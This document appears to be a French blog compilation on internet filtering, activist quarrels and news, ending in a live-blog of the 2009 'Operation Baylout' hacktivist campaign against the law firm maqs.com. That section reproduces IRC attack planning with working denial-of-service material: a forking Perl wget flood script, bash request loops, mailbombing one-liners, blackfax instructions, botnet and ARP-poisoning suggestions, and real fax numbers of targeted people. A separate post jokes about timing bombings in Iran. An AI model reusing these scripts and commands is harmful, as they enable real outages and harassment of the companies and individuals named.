Filtrage du Net : les jeux en ligne seront le prétexte français pour s’attaquer à la neutralité des réseaux

filtrageJe suis depuis hier attentivement les débats d’une autre planète sur la légalisation des jeux d’argent sur le net … pour des entreprises comme Bolloré qui est déjà en train de rapatrier ses serveurs de Malte, assuré qu’il est qu’il obtiendra sa licence et qu’il pourra sortir de l’illégalité dans laquelle il se trouve comme 25 000 acteurs de cette industrie.

D’une autre planète vous disais-je… et oui, il est question de légaliser les jeux d’argent en ligne d’un côté et de criminaliser le téléchargement de l’autre … on marche sur la tête. La prochaine étape, c’est la légalisation du crack et le retrait de la vente du Cacolac ? En dehors du risque socio sanitaire que peuvent représenter ces jeux, il faut y lire en filigrane quelques petits « détails » … trois fois rien vous allez voir.

Points communs entre HADOPI et la légalisation des jeux d’argent :

  • La création du Haute Autorité (lol) : comprenez un organisme de copains nommé par des copains chargé de garantir l’opacité de tout système de distribution … entre copains.
  • La question du « sur référencement » de l’offre légale : en clair, soit Google baisse sa culotte, soit on filtre le moteur de recherche à l’échelle française et on embauche 2 ou 3 marabouts du référencement à l’Elysée.
  • Mais le plus inquiétant, ce n’est pas vraiment ces petites magouilles entre amis dont les acteurs ne cherchent même plus à se cacher, la question en suspend, c’est l’atteinte à la neutralité du net. Il est bien question de filtrer, par toutes manières possibles et imaginables les sites « illégaux », comprenez les sites à qui cette nouvelle Haute Autorité n’aura pas daigné octroyer de licence (actuellement TOUS sont illégaux, mais comme les acteurs sont bien connus, la loi n’a jamais été appliquée). On parle d’une cinquantaine de sites qui obtiendront l’agrément de l’ARJEL, les 24 950 et des brouettes d’autres sites utiliseront surement d’autres canaux  que le référencement usuel pour rester accessibles aux joueurs français.

Le filtrage seule solution ?

Non pas du tout, il suffirait de bloquer les transactions bancaires (c’est bien plus simple à mettre en place), mais là encore, l’objectif n’est pas du tout d’empêcher des sites illegaux, mais bien de légaliser le filtrage.

Comme à son habitude sur toutes les questions du numérique visant à priver les internautes de leur liberté, le gouvernement ne s’appuie sur AUCUNE étude d’impact sur l’ensemble de l’Internet. Des professionnels auraient pourtant pu lui expliquer les effets des mesures de filtrage sur des infrastructures Cloud par exemple … ou encore de la perversion qu’il va initier en instaurant la discrimination des contenus… mais qu’est ce que le cloud et l’internet en face d’un marché qui prévoit d’avoisiner 3,5 milliards d’euros en 2015 et qu’on peut se partager … entre copains.

Je participais récemment à une table ronde pour l’Open World Forum en compagnie de Jérémie Zimmerman (LQDN), Fabrice Epelboin (RWW) et Philippe Langlois (OLPC et /tmp/lab), c’est en cette occasion que nous avons appris que  la Loppsi allait bénéficier d’un texte sur les jeux d’argent en ligne qui sera un prétexte tout choisit pour la mise en place d’un filtrage. Il faut être conscient qu’il s’agit là d’une étape indispensable pour poser la première brique portant sur la discrimination des contenus. Oubliés donc les sites pédophiles (qui ne seront de toutes faon en rien impactés par quelque mesure de filtrage que ce soit comme l’expliquait brillamment Fabrice, ils ont tout prévu, depuis des années, et les autorités le savent très bien).

Les débats à l’Assemblée s’achèveront normalement demain, vous pouvez les voir direct ici, via un flux sale …

En attendant comme l’invite à le faire la Quadrature du Net, contactez votre député pour lui exprimer vos inquiétudes sur les effets non mesurés du filtrage !

Ligue ODEBI : De l’Art de la Guerre.

« Lorsque le coup de tonnerre éclate, il est trop tard pour se boucher les oreilles. »

Je ne vais perdre trop de temps à vous expliquer mes motivations profondes à l’écriture de ce billet, certains y verront un égo surdimensionné, c’est SunTzuTwoprobablement vrai, d’autres y verront une amertume de ne pas avoir réussi à établir un dialogue avec la Ligue Odebi… ils auront également raison. Le fait est que je me suis longtemps abstenu de taper sur des personnes que je jugeais (à tort) être de mon propre camp.
Jamais je n’aurai pensé justifier mes actions auprès de la Ligue Odebi, justifier de qui je suis ou mes motivations, mais puisque vous m’y contraignez, je m’exécute.

Contrairement à un grand nombre d’entre vous, je ne suis pas un anonyme. Je ne cherche pas à me cacher parce que je n’ai rien à me reprocher. Je ne suis pas une barbouze à la solde de la « secte LQDN » et encore moins un agent des renseignements généraux. Naivement j’avais pensé avoir clarifié la situation en amont, mais comme ce n’est pas le cas, je vous livre ici le fond de ma pensée.
Je sais que je m’expose à des réactions violentes de la part de la Ligue en publiant ceci, ce n’est pas grave, j’en prends le risque, car je pense qu’il est important que les internautes sachent à qui ils ont réellement à faire en pensant soutenir la Ligue Odebi. Si les protagonistes de cette histoire réfléchissent deux secondes, peut être comprendront ils à quel point ils se sont trompés, dans le cas contraire, l’écriture de ce billet m’aura pris du temps pour rien.

Le contexte : « Arrivez comme le vent et partez comme l’éclair »

Quand la Ligue a créé son armée numérique, je suis allé m’inscrire, d’abord par curiosité, et ensuite parce que l’ambiance n’était pas si mauvaise. Même si le niveau technique et la méconnaissance des outils préconisés était pregnante chez beaucoup (administrateurs compris), j’ai accepté d’y modérer un forum.
Le channel irc de la Ligue étant hébergé sur le réseau d’Europnet et comme j’y réside depuis plusieurs années (j’y ai même un petit moment occupé quelques fonctions … par manque de temps je suis à ce jour un simple helpeur), je me suis naturellement rendu sur le channel de la Ligue; J’y ai rencontré des personnes fascinantes, instruites, … et d’autres. Puis très vite, on m’a confié l’op du channel, ce n’est pas le seul que j’administre, je suis H24 sur IRC, donc pas de problème j’ai accepté avec plaisir.

Mon implication : « Lorsque le monde est en paix, un homme de bien garde son épée à son côté. »

J’ai spontanément proposé à la Ligue un hébergement professionnel gratuit. C’est une habitude, les projets que mes collègues et moi apprécions, nous les hébergeons, c’est un juste retour aux communautés. Une psychose étrange a pourtant frappé mes interlocuteurs qui n’ont tout simplement jamais donné de réponse, méprisable jusqu’au bout … alors que nous hébergeons de nombreux gros sites et que nous avons pignon sur rue … bref, peu importe, le site semble très bien se porter chez OVH… je note simplement que la Ligue n’a jamais daigné me répondre ne serait-ce que pour me dire non « on ne te fais pas confiance » … c’est un peu lâche, mais passons.

Mon implication ne s’est pas arrêtée là, j’ai souhaité à plusieurs reprises mettre en garde la Ligue contre des communiqués maladroits, très maladroits… comme celui ci, ou celui là, ou encore un  mail livrant de manière vindicative en pature à son armée un log dont l’exploitation aurait pu causer des dommages à un hébergeur qui n’a rien demandé. Cette Ligue qui se dit rester dans la légalité, et je suis convaincu qu’elle l’est, est pourtant maladroite à bien des égards.

J’ai aussi tenté d’ouvrir un dialogue entre la Quadrature du Net (dont je suis un modeste contributeur) et la Ligue … et là, ce fut sûrement une maladresse de ma part. La ligue a manifestement une dent contre la Quadrature, je ne le savais pas avant de fouiller la merde … allez savoir pourquoi ! J’ai eu beau dire et redire que le rôle de la Quadrature se borne à fournir une base de connaissance que quiconque peut exploiter, la Ligue Odebi (du moins son « cercle » très select) exècre la Quadrature … elle lui fait de l’ombre, comprenez vous.

Aujourd’hui je m’interroge beaucoup sur les objectifs de la Ligue Odebi. La ligue est contre HADOPI, contre la Quadrature … mais pour quoi est-elle au juste ? Qu’est ce que la Ligue Odebi compte construire ? Quelles solutions a t-elle apporté ? Quand on expose un problème sans apporter de solution, c’est qu’on fait parti du problème.

De l’art de la Guerre que Ligue Odebi souhaite inculquer à son armée

Des attaques ont paralysé le site de la Ligue Odebi, puis mes propos détournés, mal interprétés, complètement sortis de leur contextes à coup de cut paste et ils ont finit par avoir raison de ma bonne volonté quand j’ai commencé a comprendre que l’on m’accusait à demi mot d’être à l’origine des attaques par DDoS contre le site de la Ligue et celui de je ne sais lequel des Partis Pirates.
Au début je n’avais pas fait le rapprochement entre la Ligue et je ne sais (toujours pas… et ça ne m’intéresse pas) lequel des Partis Pirates. Puis au détour d’une conversation j’ai compris que la Ligue comptait des membres du PP (celui du 7e arrondissement de Paris, pas le PP Suédois), initiative à laquelle je ne souhaite pas participer pour des multiples raisons, à commencer par la crédibilité de ses fondateurs et le spectacle navrant qu’ils donnent.

C’est cette profonde méconnaissance de l’action de la Quadrature par la Ligue qui a sûrement mis le feu aux poudres. C’est aussi cette profonde méconnaissance du Net et des outils de sécurité que la Ligue entend mettre entre les mains de son armée (constituée en majeure partie de jeunes fantassins qu’on envoi au casse pipe avec Metasploit par exemple) qui m’incite aujourd’hui à couper les ponts avec la Ligue.

« La guerre est semblable au feu; ceux qui ne veulent pas déposer les armes périssent par les armes. »

  • Je ne peux pas accepter d’être sur mon propre réseau et d’essuyer une demande de ban motivée par l’ignorance ;
  • Je ne peux pas accepter que l’on me soupçonne d’avoir diligenté des attaques par DDoS contre le site de la ligue Odebi que je proposais d’héberger gracieusement ;
  • Je ne peux pas accepter que l’on soupçonne la Quadrature de vouloir « récupérer » les actions de la Ligue (messieurs comparez vos stats et votre réseau avec celui de la Quadrature du Net, vous verrez que vous ne jouez pas du tout dans la même catégorie, puisque c’est la seule chose qui vous obnubile, demandez vous pourquoi les médias ne vous demandent rien alors que la Quadrature écume les studios TV et radios pour répondre en qualité d’expert sur des sujet aussi complexes que le Paquet Telecom ou le Filtrage du Net … oui la Quadrature concentre toutes les meilleures ressources sur le sujet, elles sont l’oeuvre de milliers de contributeurs … mais libre à vous de les répudier … proposez mieux dans ce cas) ;
  • Je ne peux pas accepter que des anonymous aux quels vous vous assimilez en arborant leur logo soient aussi anonymes que ça … (vive Microsoft Frontpage )… j’ai trop de respect pour leur action, je les ai rencontré, ce ne sont plus des anonymes pour moi ;
  • Je ne peux pas accepter que des gens sortis de nul part se comparent au PP suédois (eux non plus ne sont pas des anonymes, nous avons eu le temps de bien converser avec eux, que ce soit sur le channel de la Quadrature qu’ils fréquentent régulièrement ou dernièrement, sur Hacking at Random … le PP (le suédois, pas celui du 7e) force le respect et l’humilité est de mise devant leur action … l’humilité n’est pas une valeur hexagonale semble t-il) ;

Et par dessus tout, je ne peux pas accepter qu’on me menace de je ne sais quelle publication … surtout sur un site administré par des gens que je connais par ailleurs …

Je dépose donc les armes, la Ligue n’est pas mon ennemie, je ne me laisserai donc pas distraire, je poursuis mes objectifs, objectifs dont la Ligue Odebi ne fait plus parti.

« Si l’on est compréhensif, on sera tourmenté. »

  • Je ne comprends pas la paranoïa de la Ligue,
  • je ne comprends pas son empressement à communiquer de manière peu inspirée, voir provocante, sans même chercher à se blinder avant de l’ouvrir,
  • Je comprends en revanche les ambitions politiques naissantes… mais la politique c’est se mettre au service d’autrui et non se servir d’autrui et aujourd’hui j’ai l’impression que la Ligue s’est servie de moi et se sert de vous tous pour assouvir ses quelques fantasmes médiatiques et ses ambitions politiques inavouées au sein du Parti pirate (je ne sais toujours pas lequel et je m’en fout toujours autant).

« Celui qui n’a pas d’objectifs ne risque pas de les atteindre. »

  • Je peux comprendre vos ambitions,
  • Je peux comprendre votre détermination,
  • Je peux comprendre vos jalousies,
  • Mais je n’arrive plus à comprendre vos objectifs.

De cette incompréhension j’ai pris parti, de cette confiance trahie je tire mes conclusions et je vous souhaite bon vent.

« Tout l’art de la guerre est basé sur la duperie »…

Dommage que vous vous soyez trompé d’ennemi, en cherchant à me duper, vous n’avez suscité que mépris et indifférence de ma part. En dénigrant ces personnes qui comme la Quadrature du Net font vraiment avancer les choses, vous vous positionnez d’une manière fort étrange, il faudra en répondre un jour ou l’autre.

« Une armée sans espion est exactement comme un homme sans yeux ni oreilles. »

TheWorm, quand tu « tire les vers du nez » à quelqu’un qui cherche à t’aider, assures toi que ce dernier ne soit pas celui qui t’accueille. Je suis simplement déçu, je ne t’en veux pas.

Freedoman … la Quadrature n’est pas une secte, c’est un collectif qui vous mâche le travail, libre à toi de ne pas l’utiliser et de continuer à mener des actions comme tu l’entends, en attendant, comparez un peu votre bilan avec celui de la Quadrature. Si la Quadrature « occupe tout le terrain médiatique » pose toi les bonnes questions sur la manière dont la Ligue communique et surtout fait quelques recherches avant de claironner que ses acteurs « sont la depuis moins d’un an ».
Jérémie, les 2 Benjamins, Taziden, Alix, Gibus et Philippe … de nombreux contributeurs de la Quadrature … tous ces gens ont donné entre 10 et 15 ans au Net avec un grand N, ça fait des années que nous les voyons dans toutes les conventions, dans toutes les manifestations autour du libre, de la lutte anti DRM ou de la préservation de la neutralité des réseaux… et vous, vous êtes où ? Personne ne vous connaît, vous préférez jouer les barbouzes … soit.
Mais concernant la Quadrature du Net que vous jalousez tant … ça fait des années que ces gens militent à l’APRIL ou d’autres associations et collectifs pour que notre Web ne se transforme pas en minitel… Ils n’ont pas de preuve à vous donner à vous, de grâce n’inversez pas les rôles.

Vous pouvez m’insulter, pas de problème, j’assume parfaitement mes propos, assumerez vous les vôtres ?

Olivier aka Bluetouff – [email protected]

IPHONE 4 : le téléphone qui tue … vraiment

L’iPhone v4 qui sera la prochaine version du best seller d’Apple n’es pas encore sorti qu’il fait déjà des morts !

« Un employé de Foxconn, fabricant officiel d’Apple pour les iPod et iPhone, s’est donné la mort après avoir été tenu pour responsable de la disparition d’un prototype du futur iPhone d’Apple. »

depuis le site : Zone Numérique

Michael Jackson est mort

Michael Jackson aurait été victime d’un arrêt cardiaque, selon plusieurs sources.michael-jackson
Michael Jackson aurait été amené d’urgence en début d’après midi à l’hôpital de l’université de Californie (UCLA). . Son coeur ne battait plus quand les secours sont arrivés. La nouvelle aurait filtré par le New York Times dans l’après midi. Ce soir, sa mort semble confirmée, semble t-il vers 23h heure française. Sa mort n’est pas pour le moment confirmée de sources officielles, mais rien n’indique qu’il s’agit ici d’un fake. Les rumeurs de la mort de Michael Jackson sont très nombreuses, mais là pour le coup, ça semble bien réel.
Michael Jackson devait remonter sur scène en Angleterre cet été après un parcours qui fait de lui une icône musicale du 20e siècle, peut être la plus importante. Les billets s’étaient vendus en quelques heures et Michael Jackson devait dans son contrat remonter sur scène avec les Jackson five … failed.
C’est une mauvaise nouvelle pour le monde la musique qui vient de perdre un géant.

Dans la presse :

L’utilisation de TOR explose en Iran !

C’est un sujet que j’ai déjà pas mal évoqué ici : quand on bride le Net, les internautes le débrident.

TOR voit l’utilisation de son réseau exploser en Iran

C’est exactement ce qui se passe en ce moment en iran et de manière, très spectaculaire. TOR, c’est l’un des système les plus avancés d’anonymisation des surfs tracer des connexions TOR, surtout si elles sont nombreuses s’avère quasiment impossible… ja sais pas vous …. mais moi personnellement, si j’étais un terroriste iranien ou voulant agir sur le sol iranien… si on part du principe que le terrorisme c’est semer le chaos, je me dirais que le moment est bien choisit pour faire péter une ou deux bombes… les services doivent déjà être sur les dents, dans la masse de communications électroniques onion routées et chiffrées on pourrait même déclencher un détonateur par email 🙂

Oui je sais je ne suis pas drôle, mais c’est qu’il me fait peur moi Frédéric Lefèbvre avec ses bombes qui explosent tous les jours aux quatre coins de globe à cause d’internet … et je serai sûrement moins encore le jour où HADOPI aura plongé les internautes français dans une surenchêre cryptographique qui risque de mener à une métamorphose du Net pas franchement souhaitable.

Opération Baylout : les Hacktivistes rentrent dans la danse

backbone_80pc

Le blackout, le vrai … c’est pour bientôt, des hacktivistes du monde entier sont en train de se liguer contre l’IFPI. Le Paquet Telecom, la condamnation en première instance de Pirate Bay, l’HADOPI
Des manifestations numériques pourraient créer de très nombreux embouteillages dans les prochaines heures sur le site de l’IFPI, un premier raid a touché sa cible.
Pour en savoir plus voici les bonnes adresses IRC :
irc.AnonNet.org #TPB
irc.raidchan.org #seedsofliberty

L’attaque sera commentée en LIVE web radio diffusé ici : http://www.cacaw.net/cacaw/stream.php

Merci à fo0 qui m’aide à couvrir cette cyber manif d’une ampleur rarement vue

LIVE :

— Un gros raid est prévu Jeudi à 02h00 heure française, 23h UTC —

DDoS, Mailbombing, Fax, Téléphone : rien ne sera épargné aux lobbystes promettent les manifestants hacktivistes.

*22:45
— Une attaque vient d’être lancée sur http://maqs.com —.

— Un réseau d’une centaine de bots hostés chez Siemens est en train de bouriner le login.asp —

<+***> I’d take her out to dinner. Then brute force her open ports.
<+F***> I tried a sql injection
<+***> u use forms on a web page
<+***> *****: http://dubstep.7a69.co.uk/~secure/fuzzmaqslogin.pl

— Un fuzzer vient d’être codé —

my $url = ‘http://maqs.com/admin/login.aspx?ctl00$content_holder$Username=’;
sub generate_random_string
{

*22:53
<+***> I edited my grades with SQL injection exploit, it’s win.

*23:09]
<***> DoS ::1
<***> 😀
* a*** wins

* 23:17
<***> raid on thursday or friday?

* 23:20
<+***> Real men use hammers and magnets to binary themselves into the channel

* 23:27
<***> So, what cannons you guise using?
<***> I maight just DDoS
<***> perl cannon

* 23:39
#!/bin/bash
function dl_pub {
while true;
do
wget http://maqs.com/upload/downloads/SCCE%20FOCUS%20NR%204%202007%20%20Board%20member%20liabilities%20part%202.pdf
wget http://maqs.com/upload/downloads/SCCE%20FOCUS%20NR%203%202007%20Board%20member%20liabilities%20part%201.pdf
rm *liabilities*;
done
}
function dl_fake {
while true;
do
wget http://maqs.com/forgreatjustice_forgreatjustice_forgreatjustice_forgreatjustice_forgreorgreatjustice_forgreatjustice_
done
}

* 23:40
* http://pro-music.org touché
pro-music1

* 23:48
<***> if u had your own satelite with an internet connection, u cud hack all u want, and no one cud do fuck all about
<***> lol
<***> it would be so much easier
<***> if you just got every noob
<***> **** owns the bot in this room
<***> to become a slave to the botnet
<***> wats teh targert guyz
<***> :<
<***> and then you don’t have to worry about them fucking firing through a proxxy
<***> maqs.com
<***> target is one two seven zero zero one
<***> kay.
<***> damn
* *** has quit
<***> or shooting at 10 threads a second
<***> kay
<***> Jesus stop fuckin christ
<***> anyone posted in tpb forums?
<***> god damn it
<***> oh sheeeet auchtung
<***> Jesus blinds me
<***> they need a heads up, no?
<***> bold im0
<***> lsat time i tried going into tpb’s forums it 404d
<***> last time i tried going into tpb’s forums i shat brix
<***> ***: !
<***> HAHA TIEM FOR 4CHAN
<***> ddos them all

* 00:00
<***> to ifpi guys : i’m naked playing my dick and listening 8bits people mp3s

* 00:06
<***> f are you an admin with anonnet? like they let you use it for bots? because I swear you have powers on here.
<***> i haf no powerz
<***> oh god
<***> HAHAHAHAHHAHAHAH
<***> With the online faxes. Please explain the process? I really can’t get them to consider the numbers valid

* 00:12
<***> bitch i have 20 oc12s routed thru mozambique i can pump three hundred igmps at u a second

(…) i have over 400 hackers sitting around twiddling their thumbs, waiting on his IP, as soon as we get it, he is: good as dead

* 00:17

* 00:19
<***> 134.29.178.254 DDOS ME
<***> ***: whats ur max upload speed
<***> 4.88
<***> 134.29.178.254 personal army request
<***> mb
<***> i bet you’re requesting someone elses ip
<***> ill packetbomb with my 200mbps
<***> in after PA
<***> we got 38mb up

(…)
<***> why are we ddosing 134.29.178.254?
<***> do a whois

(…)
<***> At least 600 comps there, all on one network

* 00:27
<***> http://partyvan.info/wiki/Operation_Baylout#Current_Raid_Operation_plans

* 00:29
<***> http://www.timeanddate.com/counters/customcounter.html?month=4&day=23&year=2009&hour=0&min=00&sec=00&p0=0
<***> DDoS and FAX when the following counter hits zero:
<***> * Focus faxes on:
<***> 914-333-7541 (MPAA Anti-Piracy Office)
<***> +46 8 407 09 10 (Monique Wadsted’s Work)

* 00:32
<***> ***: so my zombies are anons
<***> –
<**> sd
<***> sucks.
<***> ***: wine ..
<***> ***: learn hping newfags
<***> ***: wget/ping
<***> ***: *** needs .net
<***> ty guest
<***> code a little spamming shellscript
<***> ok
<***> ***, yep, that’s what my question was about. How do you use wget in an EFFICIENT way ?
<***> ***
<***> wget -r url ? …
<***> wake up bitch
<***> just playing with hping3/scapy enjoy 🙂
<***> ***: -r -O /dev/null

* 00:35
— Invasion Francophone sur le channel —-

* 00:43
<***> i found a new vulnerability
<***> in the maqs website
<***> *** we are distributing propaganda for the attack on maqs.com tomorrow night
<***> what is the vln knightmare01
<***> thug aim
<***> 3 times fast
<***> maqs has over 9000 bandwiches
<***> maqs is the MPAA’s law firm in the trial against tpb
<***> Oh well we’re all over the news now we’re bound to get fresh new recruits for the maq attack
<***> https://owa.maqs.com/exchange <- their exchange server (on their network : 4 public ips)

* 00:48
<***> D(R?)DOS?
<***> lawl
<***> ***: no
<***> IM USING OS/2 WARP
<***> distributed reflection denial of service
<***> http://palisade.plynt.com/issues/2006Apr/ddos-reflection/
<***> whats that
<***> its a pure bandwidth attack
(…)
* *** is hosting the template for thursday’s blackfax attack. Grab your copy now at http://dl.getdropbox.com/u/121432/anonCYMK.pdf
<***> Forward that onto ***
<***> ! first person to get a timestamped picture of *** tits wins
<***> how exactly do we blackfax?
<***> well….depends…if you have 50 comps with a mimimum bandwidth of say 6MB…you could do it.

* 00:54
<***> myfax.com/free/ and faxzero.com allow you to send faxes for free over the internet
<***> I lurve blackfaxing.
<***> if any1 wants help with preparing for the raid , just PM me
<***> alternatively, use a hardware fax, and loop the black sheet of paper with tape so it loops in the fax forever
<***> when ddosing maqs what url will we be using just www.maqs.com or will we ddos the .pdfs?

* 01:05
<***> on the last attack, i wasted close to 650 MiB of my own bandwidth by raeping MAQS’ bandwidth

* 01:13
— On joue à celui qui a la plus grosse ? —
456379751

* 01:24
<+***> http://www.maqs.com/jul07/maqs_jul_07_5.swf <== RAEP THAT USING ***
<+***> wget that several times you can EASILY take the site offline.

* 01:27
<+***> while [ 1 ]; do wget -q http://URL-O /dev/null& done;
<+***> That would quite surely work

* 01:32
* *** has changed the topic to: NEW RAID ON MAQS.COM http://timeanddate.com/s/16cu | INFORMATION: http://www.partyvan.info/wiki/Operation_Baylout http://spacediction.pl/anon/raid.rar | UPDATED | NEWS: http://is.gd/tA0Q | http://wiurl.com/raid.rar | #fm 4 musics & phrankz

* 01:49
<***> bw rape script: http://pastie.org/454042.txt
<***> just config the 3 variables, and run ‘perl filename.pl’
<***> for anyone who wanted that^

* 01:58
— Le code qui va piquer derrière les yeux —
#!/usr/bin/perl -w
#
##################
# #
# WGET BW RAPE #
# #
##################
# #
# by:extrapolate #
# #
##################
##################
# #
# CONFIG BELOW #
# #
##################
my $rape = "http://www.maqs.com/jul07/maqs_jul_07_5.swf"; ##BW RAPE TARGET HERE
my $fork = "3"; ## SET THIS TO THE NUMBER OF THREADS YOU WANT.
## DONT CRASH UR PC. TEST WITH LOWER NUMBERS
## TO SEE IF IT WORKS FIRST
## Keep in mind, the higher you go, the threads
## Then increase exponentially..
## Value of 2 = 14(or something) threads cause each fork starts
## a child process that also starts more children
my $amount = "5"; ## Number of times each thread should WGET
## You can set this super duper high...all it does is tell
## The thread to repeat x number of tiems once it is done
## Higher/lower numbers will NOT impact computer performance
## or your own CPU use...they will just determine length of rape
########### don't touch below here #############################
my $y = 0;
my $x = 0;
$fork=$fork+1;
print "\nRemember to configure the 2 options inside this script\n\$rape : rape target\n\$fork : number of threads (read comment)\n";
print "\n\n Also remember...this will run forever...until you stop it (CTRL-C) :D\n\n"
print "\n\nRaping: $rape\n\n";
sleep(2);
while($y < $fork){
fork();
print "Fork Started...";
$y++;
}
$x=1;
while(1 < 2){ ##FOREVERRRR
my @wgetrape = qx/wget -q $rape -O \/dev\/null/;
print "Finished $x loops in this thread!"
$x++;
}
print "\n\nDone.\n\n";
exit;
exit;
exit;
exit;
exit;
exit;
exit;
exit;
exit;
#exit

* 02:17

<***> we need to get everyone ready to DDoS before using the real target.

(…)
<***> i think that every1 is ready for the ddos attack
<***> http://lmgtfy.com/?q=anon%20logo
<***> use a fake target like http://www.maqs.com/upload/downloads/HOW%20YOU%20SET%20UP%20BUSINESS%20IN%20DENMARK.pdf
<***> for testing.

* 02:26

<***> ***: you wanna change ‘http://spacediction.pl/anon/raid.rar‘ to ‘http://spacediction.pl/anon/

* 02:28

<***> url= »THE URL HERE »; while [ 1 ]; do wget -q $url -O /dev/null& sleep 0.3 done;
<***> Good syntax, and separates each request by a 0.3 second interval
<***> Which is sensible
<***> For legal load testing purposes that is, I find it useful using on my own servers

* 02:41

<***> cant wait 4 tomorrow at midnite
<***> yay
<***> revenge

* 02:43

http://partyvan.info/wiki/Operation_Baylout#DDoS

(…)
<***> you guys are forgetting theres a new way to indentity to 98% accuracy people on p2p networks….called the guilt-by-association attack….

* 02:52

— Net Split —
🙂

* 02:57

<***> http://www.partyvan.info/wiki/Zip_bomb

* 03:09

<***> http://pastebin.ca/1395333

* 03:41

<***> Countdown fags: http://timeanddate.com/s/16cu

* 04:06

<***> i got proof
<***> http://freeipodgiveaway.co.cc/ http://dontaecarter.com/ http://20ksecrets.com door2wealth.com

* 04:16

<***> this isn’t about TPB themsevles, this is about the case and what it means for the future of the internet. we can’t let big cooperations fuck with the law as they please

(…)
— Tom Cruise Pwn3d by Sciento fighters —

* 04:26

<***> imo , i think that anyone who speaks out against internet censorship and/or scientology is a member of Anonymous

* 08:32

<***> paste?
<***> Same one
<***> http://pastie.org/private/e9ysyrwxjmiyqhwxzsqzra
<***> cry?

* 09:04

<***> ***, try this code to see if I got the checksum right: http://pastie.org/private/e9ysyrwxjmiyqhwxzsqzra
<***> K

* 09:39

<***> ***, I really doubt this will work but could you give it a try: http://pastie.org/private/e9ysyrwxjmiyqhwxzsqzra

* 09:47

<***> I think I got it
<***> Last try for the night: http://pastie.org/private/e9ysyrwxjmiyqhwxzsqzra
<***> If it works I’ll clean it up for tomorrow

* 11:41

<***> !countdown
<***> It is 0 days 14 hours 15 minutes and 29 seconds until Thursday April 23 2009 UTC time

* 13:20

<***> use the perl script
<***> *** : http://spacediction.pl/anon/extras_wget_raper.pl

* 13:26

<***> pretty smart using wget
<***> rather than brute packet flooding
<***> There is a script in the topic

* 13:44

<***> Is maqs.com the last target, or are there more to come?
<***> ***: That’s what a debugger is for
<***> it works faster than nerds
<***> lol
<***> 127.0.0.1 is what we’re targetting now

* 13:47

<***> do it at the lwest level possible. figure out what bandwidth you have, and hit the lowest level possible that you’re able to overwhelm
<***> why lowest?
<***> because it forces the parent company major headaches, having to reroute one single IP or server cluster, for one company
<***> the point is to cause maximum damage
<***> one ip, pfft, easy reroute

* 14:42

<***> Any idea of suspected participants?(numbers)
<***> ***: gathering numbers for ‘research’?
[<***> Nah just cant wait for tonight

* 15:42

[FBI]/#tpb- Channel Topic: NEW RAID ON MAQS.COM http://timeanddate.com/s/16cu | INFORMATION: http://www.partyvan.info/wiki/Operation_Baylout | http://spacediction.pl/anon/ | UPDATED | NEWS: http://is.gd/tA0Q | http://wiurl.com/raid.rar | #fm – RAID RADIO | #TPBCHAT – NON-RAID CHATS

* 15:48

<***> New guys joined – read here for info: http://partyvan.info/wiki/Operation_Baylout#DDoS

* 15:53

<***> `countdown
<***> It is 0 days 10 hours 3 minutes and 4 seconds until Thursday April 23 2009 UTC time

* 15:56

<***> Yea seriously we have 10 hours to the attack and we’re drasticaly low on new members to the cause and you guys are dicking around. If we want this attack to work we need to pump out propaganda like nothing

* 15:58

<***> We need to recruit as many as we can in the next 10 hours
<***> spam forums.
<***> spam chats…..
<***> http://www.itavisen.no/811395/pirater-planlegger-storangrep well you did get your cause on one of the biggest norwegian IT sites
<***> spam mobiles if u can
<***> hm.. recruit.. trick.. force people..
<***> can we put a message in the BW raper?

* 16:02

<***> *** – http://seedsofliberty.webs.com/
<***> Plenty of other channels on this network though.
<***> i’m just gonna use wget

* 16:06

<***> Why don’t we use a botnet for it?
<***> Well, so if I find the biggest file, and requests it about 2000 times, it will be a bigger hump instead of just using their MAQS.com
<***> freepopfax works

(…)
[<***> like I have said people in here do have botnets, most likely they will use them

* 16:17

<***> lets use conficker to take out the internets………then feel really stupied afterwards when we sit there without teh webs
<***> http://anonym.to/ http://seedsofliberty.webs.com
<***> Start posting on some imageboards/messageboards
<***> ***, don’t need to use anonym.to in here
<***> Yea the seedsofliberty is good
<***> to much work – gonna write scripts ;-D

* 16:21

<***> ***: get their office IP by sending them a E-mail with a link that uses http://ipcatcher.net/findIP.php?lang=EN
(…)
<***> ***: no, everbody can get 5 ppl infected, 5X100= 500 bots…
<***> i have one seted up already…
<***> just need more bots
<***> ***: http://www.joedog.org/index/siege-home

* 16:24

<***> use ettercap to cause major damage to their ARP tables
<...> It is 0 days 9 hours 31 minutes and 46 seconds until Thursday April 23 2009 UTC time

* 16:29

<***> 100 mails: real0m9.570s

* 16:48

<***> *** http://pastebin.com/m7a84aa88

* 16:50

<***> http://www.non-ice.com/files/programs/mailkicker129b.exe <- final product of it... free to use .. bomb in the subject field avtivates mass sending
<***> Is it a mail spammer?
<***> non-ice: thanks for the virus
<***> flooder
<***> err:module:import_dll Library MSVBVM50.DLL (which is needed by L »Z:\\home\\***\\Pulpit\\mailkicker129b.exe ») not found
<***> err:module:LdrInitializeThunk Main exe initialization for L »Z:\\home\\***\\Pulpit\\mailkicker129b.exe » failed, status c0000135
<***> lawl
<***> ***: lawl
<***> 🙁
<***> lol you need to install visual basic to run it

<***> ***; my program uses mswinsock ocx as well

* 17:01

<***> /exec perl -e ‘open(LOL, »|mail [email protected] »);while(1){print LOL »FUCK YOU »}’

<***> ***: echo « LUV YOU »|mail [email protected], [email protected] << just bash

* 17:20

<***> use your neighbours wireless

<***> or
<***> get s shell acount somewhere and abuse it

* 17:20

<***> ***: look for SMSBomb.exe

* 17:47

<***> woot i hae a sms bomber for kazakhstan

* 17:55

<***> omg look at that
<***> http://www.partyvan.info/wiki/Operation_Baylout
<***> ya
<***> cancelled
<***> orly?
<***>  »The ONLY result these childish excuses for « raids » will have, is to disgrace the whole file-sharing community.  »
<***> cancelled? realy?

<***> anyone can edit that shit
<***> nothing is canceled
<***> whats a good server to make a IRC room?
<***> someone probably just edited that shit in there to try and stop us
<***> can anyone access partyvan.info/wiki?
<***> i’m having trouble here
<***> yup
<***> seems fine
<***> hmmm
<***> ok
<***> cant get it either
<***> weird
<***> is the RIAA DDoSing us?
<***> ‘tecnical difficulties’
<***> partyvan.info is damn slow, plz don’t give a try to ur ddos tools on it 🙂
<***> nah lol
<***> lawl yeah

* 18:07

<***> are we going to make botnets?
<***> hey i am
<***> right now

* 18:15

<***> tonite is a nite that monique wadsted will never forget
<***> the raid will go ahead as planned people
<***> we are anonymous, we are legion .We do not forgive , we do not forget

* 18:59

<***> It is 0 days 6 hours 57 minutes and 14 seconds until Thursday April 23 2009 UTC time

* 19:03

